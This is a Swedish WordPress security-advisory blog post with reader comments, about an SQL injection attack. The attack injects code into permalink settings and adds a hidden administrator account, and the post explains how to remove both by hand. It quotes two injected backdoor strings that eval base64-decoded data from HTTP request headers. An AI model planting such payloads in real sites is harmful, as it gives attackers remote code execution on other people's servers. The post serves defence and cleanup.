Många webbplatser drabbas av en nyligen inträffad SQL-attack där kod injiceras på din webbplats. Denna MySQL-injektion påverkar dina permalänkar genom att göra dem ineffektiva. Som ett resultat kommer dina blogginläggs URL:er inte att fungera. Talrika WordPress-bloggar utsattes för denna attack, tack vare Andy Soward för att ha uppmärksammat oss på detta.
En av följande koder hade lagts till din permalänkstruktur på grund av denna attack:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Dessa citattecken lades till alla permalänkar på din webbplats och det kan bara ändras om de tas bort manuellt.
För att åtgärda detta gå till:
Inställningar > Permalänkar och ta bort koden ovan och ersätt din standardkod.
Nästa sak du behöver göra är att gå till Användare. Du kommer att se att det finns mer än en administratör. Du kommer inte att se deras namn listade, men du kommer att se antalet ökat. Så vad du behöver göra är att titta på alla användare och hitta den sista som registrerades. Håll muspekaren över den användaren och få länken. Ändra koden userid= genom att lägga till 1 till det numret. Så om den sista användaren du kan se var användare #2, lägg sedan till 1 till den och gör den till 3. Du bör hitta den dolda administratören har en konstig kod som förnamn. Ta bort koden och gör honom till en prenumerant. Gå sedan tillbaka och ta bort honom.
Detta bör lösa problemet. Du kan också ta bort honom genom att helt enkelt gå till din PHPMyAdmin. Eftersom du kommer att se användaren där.
Vi ville bara få ut dessa nyheter så snabbt som möjligt, så att våra användare kan uppdateras. Se till att kontrollera att din blogg inte är infekterad. Vi hoppas att WordPress kommer med en ny version snart.
Dessutom, om du inte har implementerat några av dessa åtgärder för att säkra ditt WordPress Admin Area.
ahmed_alaaedin
Min webbplats databas injicerades för några dagar sedan, med några konstiga tecken och ord efter varje inläggs- eller sid-URL. Jag kunde inte hitta något konstigt i inställningarna: permalänkar eller i användarmenyn. Vad ska jag göra för att lösa detta problem, snälla? Mitt webbhotell har en säkerhetskopia av den infekterade databasen också!
en wordpress-användare
Jag blev träffad av detta två gånger.
första gången var wassup plugin sql injection, den här gången är jag inte säker. min hostingleverantör har blockerat mig.
när de återställer mitt konto kommer jag att ta bort wordpress.. Jag har fått nog!
Redaktionell personal
Kanske är det inte WordPress fel, kanske är din hosting-säkerhet helt enkelt inte tillräckligt bra...
Admin
Joey
Vad kom du fram till med detta? Jag blev precis drabbad av samma problem. Alla mina WP-sajter på mitt konto lider av samma problem.
lerrkin
Hej.
Intressant URL https://014.leahstevensyj.workers.dev/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ länkad härifrån visar en tom sida.
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
Redaktionell personal
Vi uppskattar verkligen denna kommentar, problemet låg inte hos WP Super Cache, vi tror att det var pluginet som heter WP External Link. Vi avinstallerade och installerade om WP-Super Cache två gånger, men sedan jämförde vi utvecklingsservern där allt fungerade bra. Skillnaden var detta plugin. När vi tog bort det pluginet fungerade det. Du kan nu läsa det inlägget.
Admin
lerrkin
Maybe that was WP External Link and Super Cache conflict…
Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible
So last Super Cache ver. promises to do not html validity check.
Åh, jag läser!
Tack så mycket!
Roseli A. Bakar
Thanks for highlighting this